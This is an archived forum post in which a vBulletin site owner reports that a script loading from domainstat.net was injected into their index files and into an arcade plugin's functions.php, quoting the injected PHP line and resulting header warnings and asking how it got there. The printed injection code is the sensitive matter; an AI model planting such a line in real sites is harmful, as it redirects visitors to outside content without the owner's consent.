vb.org Archive - View Single Post - Major Additions - ibProArcade

theodonnells · #**1238** 01-12-2006, 01:20 PM

This script shows up on my homepage

Code:

<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'>

so i searched through my site files and found the above file in every index.htm file, its a redirect to some advertising....Members complained the arcade wasnt working so had a look at the error they were getting..

Code:

Warning: Cannot modify header information - headers already sent by (output started at /home/www/toonunit/vb/arcade/functions/functions.php:1965) in /arcade.php on line 1711

Warning: Cannot modify header information - headers already sent by (output started at /home/www/toonunit/vb/arcade/functions/functions.php:1965) in /arcade.php on line 1712

Warning: Cannot modify header information - headers already sent by (output started at /home/www/toonunit/vb/arcade/functions/functions.php:1965) in /arcade.php on line 1713

Warning: Cannot modify header information - headers already sent by (output started at /home/www/toonunit/vb/arcade/functions/functions.php:1965) in /arcade.php on line 1714

looked at line 1965 and found this code!

Code:

<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>

This is the last line in the file how could someone have got this there....I am running vbulletin 3.5.3.....
Contacted my host and they told me to change my ftp username and password. But nothing else in the site was changed, so i dont think it was done through that.
Any ideas?

Seems this is a server exploit once on your shared server it moves from domain to domain putting this script in any chmod 777 files and folders....

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01098 seconds Memory Usage 1,766KB Queries Executed 11 (?)
More Information
Template Usage: (1)SHOWTHREAD_SHOWPOST (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (3)bbcode_code (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_box (1)post_thanks_button (1)post_thanks_javascript (1)post_thanks_navbar_search (1)post_thanks_postbit_info (1)postbit (1)postbit_onlinestatus (1)postbit_wrapper (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit reputationlevel showthread	Included Files: ./showpost.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/functions_bigthree.php ./includes/class_postbit.php ./includes/class_bbcode.php ./includes/functions_reputation.php ./includes/functions_post_thanks.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_postinfo_query fetch_postinfo fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete showpost_start bbcode_fetch_tags bbcode_create postbit_factory showpost_post postbit_display_start post_thanks_function_post_thanks_off_start post_thanks_function_post_thanks_off_end post_thanks_function_fetch_thanks_start post_thanks_function_fetch_thanks_end post_thanks_function_thanked_already_start post_thanks_function_thanked_already_end fetch_musername postbit_imicons bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete postbit_display_complete post_thanks_function_can_thank_this_post_start showpost_complete
Messages: